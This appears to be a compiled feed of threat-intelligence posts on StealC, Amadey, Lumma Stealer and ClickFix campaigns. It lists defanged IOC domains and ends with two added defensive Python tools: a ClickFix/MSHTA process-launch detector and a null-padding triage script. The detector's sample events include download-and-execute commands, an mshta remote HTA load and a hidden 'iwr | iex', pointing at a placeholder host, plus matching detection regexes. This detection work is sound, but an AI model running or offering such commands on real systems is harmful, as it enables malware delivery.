StealC and Amadey: Breaking down infostealers and the cybercrime services that deliver them

Infostealers remain among the most pervasive cybercrime threats, silently harvesting passwords, cookies, and session tokens that enable enterprise breaches. StealC is a malware-as-a-service infostealer written in C++ that collects credentials from browsers, cryptocurrency wallets, messaging applications, email clients, and gaming platforms while functioning as a secondary loader. Amadey operates as a modular backdoor loader active since 2018, delivering downstream payloads including StealC, Lumma Stealer, and ransomware through various backdoor commands. Both operate on commodity rental models where stolen credentials flow through underground markets to access brokers who resell enterprise access. On June 24, 2026, Microsoft's Digital Crimes Unit coordinated with Europol to disrupt over 200 malicious command-and-control domains supporting these operations, using AI-assisted analysis tools including Microsoft Copilot for binary analysis and configuration extraction.

Pulse ID: 6a3bde31cd05f010063a2224
Pulse Link: https://otx.alienvault.com/pulse/6a3bde31cd05f010063a2224
Pulse Author: AlienVault
Created: 2026-06-24 13:40:01

Be advised, this data is unverified and should be considered preliminary. Always do further verification.

#Amadey #BackDoor #Browser #Cookies #CyberCrime #CyberSecurity #Email #InfoSec #InfoStealer #LummaStealer #Malware #MalwareAsAService #Microsoft #OTX #OpenThreatExchange #Password #Passwords #RAT #RansomWare #Stealc #Word #bot #cryptocurrency #AlienVault

LevelBlue - Open Threat Exchange

🚨 New #ClickFix IOC domains observed:

• bigblower[.]click
• ganiballektor[.]cfd
• lenders[.]digital
• pusanik[.]shop

Related research points to exposed / publicly accessible ClickFix infrastructure and operational dashboards tied to ongoing malware delivery and social engineering activity.

Read more: https://potato.id/en/posts/weak-secops-exposed-clickfix-dashboard/

#ThreatIntel #IOC #CyberSecurity #Infosec #DFIR #SOC #ThreatHunting #OSINT #Malware #Phishing #ClickFix #LummaStealer #DarkGate #CredentialTheft #BlueTeam #CTI #DetectionEngineering #IncidentResponse

How I Got Access to a ClickFix Dashboard Due to Bad SecOps

Discover how weak SecOps practices exposed a ClickFix admin dashboard. This cybersecurity case study covers reconnaissance techniques, security misconfigurations and key lessons learned.

Jonias Fortuna

Microsoft Utility MSHTA Fuels Malware Surge via Lumma Stealer Campaigns

Malware campaigns are on the rise, fueled by the Microsoft Utility MSHTA, which is being exploited to spread info stealers like Lumma Stealer and Amatera. This sneaky tactic is just the latest example of how cybercriminals are abusing a long-standing Windows feature to wreak havoc.

https://osintsights.com/microsoft-utility-mshta-fuels-malware-surge-via-lumma-stealer-campaigns?utm_source=mastodon&utm_medium=social

#LummaStealer #Mshta #MalwareLoader #InfoStealer #Amatera

OSINTSights

REMUS Infostealer has emerged as a major threat, shifting its focus from credentials to authenticated browser sessions. This sophisticated Malware-as-a-Service bypasses MFA entirely by stealing your active login tokens *after* you've passed authentication. It's a fundamental shift in cybercrime strategy that demands a new approach to security.

https://www.tpp.blog/24wzjyk

#cybersecurity #remusinfostealer #lummastealer

🤖 This post was AI-generated.

Vercel Breach Exposes Additional Customer Accounts

A recent Vercel breach exposed additional customer accounts after a malicious chain of events began with a compromised employee account at Context.ai, which was likely triggered by a simple online search for Roblox scripts. The breach highlights the risks of malware distribution and token theft, with threat intel pointing to a sophisticated…

https://osintsights.com/vercel-breach-exposes-additional-customer-accounts?utm_source=mastodon&utm_medium=social

#VercelBreach #EmergingThreats #SupplyChain #MalwareOperations #LummaStealer

OSINTSights

From a Roblox script to the Vercel breach: how an infostealer nearly compromised the Next.js supply chain

A Context.ai employee infected with Lumma Stealer via a Roblox script opened the door to a potential supply chain attack on Vercel and Next.js. ShinyHunters claims the theft of source code, NPM/GitHub tokens and 580 employee records, offering the package for $2 million. Vercel confirms limited access but rules out any compromise of the open-source frameworks.

https://insicurezzadigitale.com/dal-roblox-script-al-breach-di-vercel-come-un-infostealer-ha-quasi-compromesso-la-supply-chain-di-next-js/

ISC Diary: #LummaStealer infection with #SectopRAT (#ArechClient2) https://isc.sans.edu/diary/32904

New ClickFix variant: cybercriminals drop Win+R in favour of Win+X and Windows Terminal

Security researchers from Microsoft Defender warn of a new variant of a malware campaign in which cybercriminals use phishing to talk users into installing infostealer malware (Lumma Stealer). The attack relies on the ClickFix technique, which consists of convincing the user to run malicious PowerShell commands. TLDR: the attack scheme is fairly simple. Using social engineering...

Sekurak

#Aktualności #Clickfix #LummaStealer #Microsoft #Windows #WindowsDefender

https://sekurak.pl/nowy-wariant-metody-clickfix-cyberprzestepcy-rezygnuja-z-winr-na-rzecz-winx-i-terminala-windows/
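The MSHTA post and the ClickFix/Win+X post above describe the same endpoint pattern: a user-driven launch of mshta.exe or PowerShell from the Run dialog or Windows Terminal with a remote payload on the command line. The block below is an added example, not code or data from any of the posts, sites or vendors above. It runs a detection rule over constructed Sysmon-style process-creation events (one JSON object per line with Event ID 1 field names); the field layout, the parent-process list (OpenConsole.exe is included as an assumption about Windows Terminal builds that host the shell under the console process), the regexes and the alert rule are all my assumptions, and `example.invalid` is a reserved, non-resolving name.

```python
"""ClickFix / MSHTA launch detection over Sysmon-style process-creation events.
Added example: the events, field layout, parent list and regexes are constructed
assumptions, not data or code from the posts above."""
import json
import ntpath
import re
from dataclasses import dataclass


@dataclass
class ProcEvent:
    parent: str    # lower-cased basename of ParentImage
    image: str     # lower-cased basename of Image
    cmdline: str


# Where a ClickFix victim types the pasted command: the Run dialog (child of
# explorer.exe) or Windows Terminal (Win+X path). OpenConsole.exe is an assumption
# for Terminal builds that host the shell under the console process.
INTERACTIVE_PARENTS = {"explorer.exe", "windowsterminal.exe", "openconsole.exe"}
LOLBINS = {"mshta.exe", "powershell.exe", "pwsh.exe", "cmd.exe"}

# Command-line traits typical of ClickFix / MSHTA lures (assumed patterns).
TRAITS = [
    (re.compile(r'mshta(\.exe)?\s+"?https?://', re.I), "mshta loading a remote HTA"),
    (re.compile(r"-(enc|ec|encodedcommand)\s+[A-Za-z0-9+/=]{20,}", re.I), "encoded PowerShell"),
    (re.compile(r"\b(iwr|irm|invoke-webrequest|invoke-restmethod|downloadstring|downloadfile)\b", re.I),
     "in-line web download"),
    (re.compile(r"\|\s*iex\b|invoke-expression", re.I), "piped into Invoke-Expression"),
    (re.compile(r"-w(indowstyle)?\s+hidden\b", re.I), "hidden window"),
]


def parse_event(line: str) -> ProcEvent:
    """One JSON object per line carrying Sysmon Event ID 1 field names (assumed export format)."""
    d = json.loads(line)
    return ProcEvent(
        ntpath.basename(d["ParentImage"]).lower(),
        ntpath.basename(d["Image"]).lower(),
        d["CommandLine"],
    )


def score(ev: ProcEvent) -> list[str]:
    """Return the reasons to alert, or [] if the event is not interesting."""
    if ev.image not in LOLBINS:
        return []
    reasons = [label for rx, label in TRAITS if rx.search(ev.cmdline)]
    if ev.parent in INTERACTIVE_PARENTS and reasons:
        return ["launched from " + ev.parent] + reasons
    # mshta fetching an HTA over HTTP is worth a look whatever launched it.
    if ev.image == "mshta.exe" and "mshta loading a remote HTA" in reasons:
        return reasons
    # Encoded PowerShell under svchost/taskeng is a scheduled-task question,
    # out of scope for this user-typed-command rule.
    return []


def detect(log_text: str) -> list[tuple[int, list[str]]]:
    """(line index, reasons) for every alerting line."""
    out = []
    for i, line in enumerate(log_text.splitlines()):
        if not line.strip():
            continue
        reasons = score(parse_event(line))
        if reasons:
            out.append((i, reasons))
    return out


# Constructed sample events (paths and commands are illustrative, not observed).
_PS = r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"
_WT = r"C:\Program Files\WindowsApps\Microsoft.WindowsTerminal\WindowsTerminal.exe"
SAMPLE_EVENTS = [
    {"ParentImage": r"C:\Windows\explorer.exe", "Image": r"C:\Windows\System32\mshta.exe",
     "CommandLine": "mshta https://example.invalid/verify.hta"},
    {"ParentImage": _WT, "Image": _PS,
     "CommandLine": 'powershell -w hidden -c "iwr https://example.invalid/c.txt | iex"'},
    {"ParentImage": _WT, "Image": _PS, "CommandLine": r"powershell Get-ChildItem C:\Users"},
    {"ParentImage": r"C:\Windows\explorer.exe", "Image": r"C:\Windows\System32\cmd.exe",
     "CommandLine": "cmd /c dir"},
    {"ParentImage": r"C:\Windows\System32\svchost.exe", "Image": _PS,
     "CommandLine": "powershell -enc SQBuAHYAbwBrAGUALQBXAGUAYgBSAGUAcQB1AGUAcwB0AA=="},
]
SAMPLE_LOG = "\n".join(json.dumps(e) for e in SAMPLE_EVENTS)

if __name__ == "__main__":
    for idx, why in detect(SAMPLE_LOG):
        print(idx, SAMPLE_EVENTS[idx]["CommandLine"], "->", "; ".join(why))
```

Against the constructed log, only the first two events alert: the mshta launch from explorer.exe and the hidden-window `iwr ... | iex` typed into Windows Terminal. The admin running `Get-ChildItem` from the same terminal and the encoded PowerShell under svchost.exe do not, which is deliberate: the rule is scoped to commands a user pasted, and scheduled-task abuse needs its own parent-process logic. Feed it a real Sysmon or EDR export with the same three fields and tune `TRAITS` against your own benign baseline before alerting on it.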

CTM360 identifies an active campaign leveraging Google Groups and Google-hosted redirect chains to deliver Lumma Stealer (Windows) and a trojanized Chromium fork branded “Ninja Browser” (Linux).
Technical highlights:
• 950MB padded executable (null-byte inflation)
• AutoIt loader reconstruction
• Memory-resident payload execution
• Multipart/form-data POST exfiltration
• Malicious extension “NinjaBrowserMonetisation”
• XOR + Base56-like JS obfuscation
• Scheduled task persistence
• Russian search engine default modification

This campaign reinforces a critical shift: SaaS platforms are now delivery infrastructure.
Defensive priorities:
– IoC blocking at firewall + EDR
– Redirect chain inspection
– Extension audit controls
– Endpoint scheduled task monitoring

How are you adjusting detection engineering for SaaS-based malware distribution?
Engage below.

Source: https://www.ctm360.com/reports/ninja-browser-lumma-infostealer

Follow @technadu for ongoing threat intelligence coverage.

#ThreatIntel #MalwareResearch #DetectionEngineering #SOCOperations #EDR #CloudSecurity #SaaSAbuse #LummaStealer #LinuxThreats #CTM360 #IncidentResponse
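The CTM360 post lists a 950 MB executable inflated with null bytes, a trick that pushes a sample past the size limits of many scanners and sandboxes and breaks hash matching against the unpadded loader. The block below is an added example and not CTM360's or any vendor's tooling: it measures trailing null padding by scanning backwards so the file is never loaded whole, hashes the de-padded content so inflated variants collapse to one indicator, and runs on a constructed sample (a 16 KiB stand-in payload plus 3 MiB of zeros). The 50 % / 1 MiB thresholds and the file names are assumptions.

```python
"""Triage of null-byte-inflated executables. Added example, not CTM360's or any
vendor's tooling; the sample file is constructed and the thresholds are assumptions."""
import hashlib
import os
import tempfile

CHUNK = 1 << 20  # read in 1 MiB pieces so a 950 MB sample never sits in memory


def trailing_null_run(path: str, chunk: int = CHUNK) -> int:
    """Length of the contiguous 0x00 run at the end of the file, scanned backwards."""
    size = os.path.getsize(path)
    run, pos = 0, size
    with open(path, "rb") as f:
        while pos > 0:
            step = min(chunk, pos)
            pos -= step
            f.seek(pos)
            block = f.read(step)
            kept = block.rstrip(b"\x00")
            run += len(block) - len(kept)
            if kept:          # reached real data, stop scanning
                break
    return run


def stripped_sha256(path: str, chunk: int = CHUNK) -> str:
    """SHA-256 of the file minus its trailing padding: inflated variants of the
    same loader collapse to one hash that can be matched against the unpadded sample."""
    remaining = os.path.getsize(path) - trailing_null_run(path, chunk)
    h = hashlib.sha256()
    with open(path, "rb") as f:
        while remaining > 0:
            block = f.read(min(chunk, remaining))
            if not block:
                break
            h.update(block)
            remaining -= len(block)
    return h.hexdigest()


def padding_verdict(path: str, min_ratio: float = 0.5, min_bytes: int = 1 << 20) -> dict:
    """Flag a file as inflated when at least min_bytes AND min_ratio of it is trailing
    zeros (assumed thresholds; tune against your own benign corpus)."""
    size = os.path.getsize(path)
    run = trailing_null_run(path)
    ratio = run / size if size else 0.0
    return {
        "size": size,
        "trailing_nulls": run,
        "ratio": round(ratio, 4),
        "inflated": run >= min_bytes and ratio >= min_ratio,
        "stripped_sha256": stripped_sha256(path),
    }


def build_sample(dir_: str, name: str, payload: bytes, pad: int) -> str:
    """Write a constructed file: payload followed by `pad` null bytes (the inflation trick)."""
    path = os.path.join(dir_, name)
    with open(path, "wb") as f:
        f.write(payload)
        f.write(b"\x00" * pad)
    return path


def demo() -> tuple[dict, dict]:
    """Verdicts for a padded and an unpadded copy of the same constructed payload."""
    payload = b"MZ" + bytes(range(256)) * 64    # 16 KiB stand-in for a loader, ends in 0xFF
    with tempfile.TemporaryDirectory() as d:
        padded = build_sample(d, "inflated.bin", payload, 3 * CHUNK)
        plain = build_sample(d, "plain.bin", payload, 0)
        return padding_verdict(padded), padding_verdict(plain)


if __name__ == "__main__":
    for v in demo():
        print(v)
```

The padded copy comes back with roughly 99 % trailing zeros and `inflated` set, the plain copy with none, and both carry the same `stripped_sha256`, which is the value to pivot on when a 950 MB upload has to be matched against a kilobyte-sized sample in a sandbox feed. Trailing-zero scanning is only the cheap first pass: padding inserted mid-file or filled with random bytes will pass it, so treat an unexpected size-to-section-table mismatch in the PE header as the next check.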